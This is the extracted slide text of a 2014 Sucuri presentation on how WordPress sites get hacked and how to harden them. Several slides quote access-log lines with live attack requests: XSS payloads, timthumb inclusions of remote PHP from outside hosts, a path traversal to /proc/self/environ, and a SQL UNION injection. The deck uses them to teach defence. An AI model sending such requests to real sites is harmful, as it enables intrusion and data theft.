  • 12. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 13 Darkleech Cdork (Apache) Ebury (SSH) Email Server (SPAM)  Going Deeper than the application layer, targeting the server.  Server Polymorphism – a.k.a highly adaptive / sophistication Heartbleed (OpenSSL)
  • 13. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 14
  • 14.  Pharmacy  Payday Loans 4/29/2014 Tony Perez | @perezbox | @sucuri_security 16
  • 15. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 17  ExploitingAccess Control
  • 16. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 18 Site 1 Site 2Site 3 Site 4 Cross-Site Contamination
  • 17. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 19
  • 18. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 20
  • 19. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 21
  • 20. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 22
  • 21. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 23
  • 22. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 24
  • 23. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 25
  • 24. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 26
  • 25.  Explosion in the Malware as a Service (MaaS) trade  Yes, pay someone to hack for you  Different tools to break in and generate payloads  Brute force and vulnerability exploits Malware Payloads  Blackhole ExploitAuthor Arrested 4/29/2014 Tony Perez | @perezbox | @sucuri_security 27
  • 27. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 29
  • 28. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 30
  • 29. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 31  Use for malware?  Burrow into network?  Steal data? What kind of website do you have?
  • 30. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 32
  • 31. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 33 38.123.140.6 - - [18/Feb/2013:18:23:23 -0500] "GET /cgi-bin/viewcvs.cgi/?cvsroot=<script>foo</script> HTTP/1.1" 302 227 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)" 123.151.39.41 - - [18/Mar/2013:16:20:12 -0400] "GET /art/all/animals/%3C%2Fscript%3E%3Cimg+src%3D%40+onerror%3Dalert%287872%29+%2F%3E HTTP/1.1" 404 268  Stored  Reflective
  • 32. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 34
  • 33. [02/Apr/2013:00:32:58 -0400] "GET /results/wp-content/themes/Convertible/timthumb.php?src=http%3A%2F%2Fflickr.easyneffective.com%2Fcrotz.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko/20100101 Firefox/11.0” 83.170.99.221 - - [03/Apr/2013:13:03:16 -0400] "GET /results/chinchedbistro.com&amp;sa=U&amp;ei=vGBcUYS1IcOaiQLxu4HIBg&amp;ved=0CCYQFjAE&amp;usg=AFQjCNFN1APEnX9- WPS337kMyPUz0yDM8A/wp-content/themes/vulcan/lib/scripts/thumb.php?src=http://wordpress.com.4creatus.com/info.php HTTP/1.1" 200 11983 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6” 82.98.131.101 - - [03/Apr/2013:12:59:56 -0400] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../../../../../../../../../..//proc/self/environ%0000 HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6" 4/29/2014 Tony Perez | @perezbox | @sucuri_security 35
  • 34. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 36 62.122.71.181 - - [03/Apr/2013:05:24:22 -0400] "GET //?malware-999.9+union+select+0-- HTTP/1.1" 200 26336 "-" "Mozilla/5.0 (Windows NT;en-us) Firefox/3.5.9”
  • 35. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 37
  • 36. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 38
  • 37.  http://blog.sucuri.net/2014/03/unmasking-free-premium- wordpress-plugins.html 4/29/2014 Tony Perez | @perezbox | @sucuri_security 39 - SEOPresser - Payload located: wp-content/plugins/seo-pressor(gratuit) - File: central.class.php - Flat Skins Pack Extension - Payload located: wp-content/restrict-content-pro/includes/ - File: sidebar.php - Restrict Content Pro - Paylaod located: wp-content/ubermenu-skins-flat
  • 38.  Brand Reputation  Legal Implications  Impact to Sales  Blacklisted by Search Engines  Blacklisted by Payment processors  Worst Day Of your Life 4/29/2014 Tony Perez | @perezbox | @sucuri_security 40
  • 39. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 41
  • 40.  Sucuri properties suffer:  ~125,000 web based attacks a month on average  ~4,000 attacks a day ▪ This spikes on occasion  Doesn’t include server level attacks  All flavors of attacks 4/29/2014 Tony Perez | @perezbox | @sucuri_security 42
  • 41.  Principles  Access Control  Vulnerabilities 4/29/2014 Tony Perez | @perezbox | @sucuri_security 43
  • 42. “It’s about risk reduction… risk will never be zero…” 4/29/2014 Tony Perez | @perezbox | @sucuri_security 44
  • 43. “…a concept in which multiple layers of security controls (defenses) are placed throughout an information technology (IT) system. Its intent is to provide redundancy in the event a security control fails or a vulnerability is exploited…” 4/29/2014 Tony Perez | @perezbox | @sucuri_security 45
  • 44.  Passwords 4/29/2014 Tony Perez | @perezbox | @sucuri_security 46 Complex – Long - Unique
  • 45. “requires that in a particular abstraction layer of a computing environment, every module (such as a process, a user or a program depending on the subject) must be able to access only the information and resources that are necessary for its legitimate purpose.” 4/29/2014 Tony Perez | @perezbox | @sucuri_security 47
  • 46. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 48  PHP Execution, disable it:  /wp-includes  /wp-content  /themes  /plugins  /uploads <Files *.php> Deny from all </Files>
  • 47.  WP-CONFIG File Modification #Disable Plugin /Theme Editor Define(‘DISALLOW_FILE_EDIT’,true); 4/29/2014 Tony Perez | @perezbox | @sucuri_security 49
  • 48. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 50
  • 49. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 51 NOTTHAT HARD!!!!
  • 50. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 52
  • 51. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 53
  • 52. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 54 1. Employ Website Firewall 2. Don’t let WordPress write to itself 3. Filter Access by IP 4. Use a dedicated server / VPS 5. Monitor all Activity (Logging) 6. Enable SSL for transactions 7. Keep environment current (patched) 8. No Soup Kitchen Servers Ideal implementations: 1. Connect Securely – SFTP / SSH 2. Authentication Keys / wp- config 3. Use Trusted Sources 4. Use a local Antivirus – MAC too 5. Permissions - D 755 | F 644 6. Least Privileged Principles 7. Accountability 8. Backups – Include Database The Bare Minimum:
  • 53. 1. Fix index.php file and assume all is fine. 1. Panic your way into WordPress Forums after hack. 1. Don’t worry about updating. 1. Trust third-party extensions. 1. Apply all upgrades on live site. 1. Install and forget, all is well with your new site. 1. Use the same username and password for everything. 1. Don’t waste time making security adjustments to PHP and settings. 1. No regular backups required. 1. Use the cheapest host. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 55
  • 54. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 56 Name Tool Sucuri Blog http://blog.sucuri.net SucuriTV http://sucuri.tv Malware Scanner http://sitecheck.sucuri.net Malware Scanner http://unmaskparasites.com Badware Busters https://badwarebusters.org Google Forums http://productforums.google.com/forum/#!categories/webmasters/malware--hacked- sites GoogleWebmasterTools http://support.google.com/webmasters/bin/answer.py?hl=en&answer=163633 Secunia SecurityAdvisories http://secunia.com/community/advisories/search/?search=wordpress Exploit-DB http://www.exploit- db.com/search/?action=search&filter_description=Wordpress&filter_platform=31 WordPress Hacked FAQ http://codex.wordpress.org/FAQ_My_site_was_hacked WordPress Hardening http://codex.wordpress.org/Hardening_WordPress
  • 55. 4/29/2014 Tony Perez | @perezbox | @sucuri_security 57 Sucuri, Inc. Tony Perez http://sucuri.net http://blog.sucuri.net @perezbox | @sucuri_security